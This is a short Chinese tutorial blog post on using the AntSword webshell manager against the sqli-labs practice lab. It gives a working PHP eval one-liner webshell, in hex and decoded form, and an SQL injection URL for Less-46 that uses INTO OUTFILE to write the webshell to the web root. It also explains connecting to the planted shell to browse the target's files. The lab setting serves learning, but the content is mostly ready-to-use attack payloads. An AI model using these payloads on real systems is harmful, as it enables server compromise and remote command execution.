中国蚁剑使用方法

情分丶2025-07-10 9:24

找到mysql配置文件

python 复制代码 
secure-file-priv=

工作目录

python 复制代码 
D:\tool\huli\gui_webshell\AntSword\AntSword\antSword-master

重点是tool目录后面 前面大家可能都不一样

添加数据

一句话木马

python 复制代码 
3C3F706870206576616C28245F504F53545B22636D64225D293B3F3E
翻译过来
<?php eval($_POST["cmd"]);?>

示例天书第46关上传木马

python 复制代码 
/?sort=1%20into%20outfile%20"D:\\phpstudy_pro\\WWW\\sql\\sqli-labs-master\\Less-46\\test1.php"%20lines%20terminated%20by%200x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

选择你上传一句话木马的url地址 具体到 你上传的文件名

这个参数就是连接密码

完成操作后 可以操作对方的目录

相关推荐
网络研究院4 小时前
中国网络安全与数据保护领域政策与执法动态回顾(2026年3月)
网络安全·数据保护·法规·政策·回顾
HackTwoHub4 小时前
WEB扫描器Invicti-Professional-V26.50.0(自动化爬虫扫描)更新
前端·人工智能·chrome·爬虫·web安全·网络安全·自动化
humors2214 小时前
六位数字密码表示
安全·网络安全·密码学
68岁扶墙肾透5 小时前
Edu实战-某高校信息系统代码审计
安全·web安全·网络安全·php
网络研究院5 小时前
中国网络安全与数据保护领域政策与执法动态回顾(2026年5月)
网络安全·数据保护·执法·政策·回顾
以太浮标20 小时前
华为eNSP模拟器综合实验之- 路由黑洞场景解析及实验
运维·网络·网络协议·网络安全·华为·智能路由器·信息与通信
SmileAndFun1 天前
收到安全通报后,如何划分责任做存证溯源?
安全·网络安全·渗透测试·等保测评·溯源取证·监管通报·电子存证
文章永久免费只为良心1 天前
Wi-Fi 渗透测试完全指南:从监听模式到高级攻击(合法授权专用)
网络安全·渗透测试·红队专用·渗透测试网络测试
顾凌陵1 天前
文件包含与下载读取漏洞实战
网络安全
Latticy1 天前
内网渗透-横向移动-IPC配合计划任务(schtasks)和系统服务横向移动(sc)
web安全·网络安全·内网渗透·内网
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04Codex 下载安装指南:Windows 和 macOS 官方版下载05Codex 桌面端更新后 Chrome 插件和 Computer Use 不可用,怎么排查和修复06CC-Switch 下载、安装与使用配置指南【2026.5.29】07【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法08CC-Switch & Claude 基于 Linux 服务器安装使用指南09Codex 接入 DeepSeek API 完整配置文档10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法